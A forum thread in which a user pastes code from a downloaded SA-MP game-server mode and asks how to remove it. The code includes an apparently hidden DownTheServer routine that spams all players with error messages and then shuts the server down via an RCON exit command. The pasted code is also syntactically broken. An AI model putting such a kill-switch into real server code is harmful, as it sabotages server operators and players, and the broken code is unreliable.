I downloaded mode from internet and there's a error
#1

Код:
};

forward DownTheServer();
public DownTheServer()
{
	for(new i=0; i<50; i++)
	{
		SendClientMessageToAll(-1, "{FF0000}оег вреб - мк ъзфщ ой йртрт аеък");
		SendClientMessageToAll(-1, "{FF0000}[ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR]");
	}
	SendRconCommand("exit");
}
forward PasswordExit();
public PasswordExit() for(new i=0; i<MAX_PLAYERS; i++) if(IsAdminLevel(i)>11) SendClientMessage(i, -1, "{00FF00}ъжлешъ: ан ма ъчйщ аъ дсйсоа ъек гчд доег йфем");

forward GMX1(playerid);
public GMX1(playerid)
{
	if(GMX_Sec> 0)
	{
	for(new i=0; i<MAX_PLAYERS; i++) if(IsPlayerConnected(i)) {
	PlayerPlaySound(playerid,1056,0.0,0.0,0.0);}
	format(str, sizeof(str), "~g~%d", GMX_Sec--);
	GameTextForAll(str, 1000, 6);
	}
	else
	{
	if(IsPlayerConnected(i))
	{
	KillTimer(GMX_TIMER);
	GMX = 0;
	}
	}
	}
}
How I can removed it?
Reply
#2

We don't even know the error, are you kidding? ^^ Give us information and format your code properly ...
Reply
#3

It's the code, How I remove it? maybe you want from me to give you the download of this mode?
Reply
#4

Which line give you a error ? You need to show the error message and the line of the code.
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)